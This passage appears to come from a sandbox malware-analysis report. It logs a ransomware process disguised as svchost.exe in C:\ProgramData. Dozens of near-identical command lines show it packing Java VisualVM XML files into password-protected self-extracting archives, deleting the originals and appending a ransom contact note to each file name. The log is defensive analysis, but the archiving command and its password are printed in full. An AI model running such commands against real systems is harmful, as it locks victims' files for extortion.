- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2088
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:732
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2072
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:760
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-explorer.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-explorer.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1412
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:896
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-loaders.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-loaders.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1416
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-nodes.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-nodes.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2948
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-options.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-options.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2940
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-text.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-text.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2656
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2908
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2288
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2708
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2640
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3056
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2604
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2632
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-execution.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-execution.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1948
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-io-ui.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-io-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2536
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2208
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:348
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1692
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-startup.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-startup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2128
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-ui.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1720
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-windows.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-windows.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1900
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1668
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2480
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1248
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-cli.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-cli.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2116
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1916
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1884
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2672
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2220
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1696
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-favorites.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-favorites.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1200
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-javahelp.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-javahelp.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2516
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-fallback.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-fallback.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:336
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2212
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2664
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1172
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2464
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-keymap.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-keymap.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2800
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-print.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-print.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1676
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:760
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:548
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sampler.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sampler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1484
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sendopts.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sendopts.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1512
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2984
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-spi-actions.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-spi-actions.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2944
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-uihandler.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-uihandler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2728
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3044
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2808
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2816
- C:\ProgramData\msvkp\svchost.exe
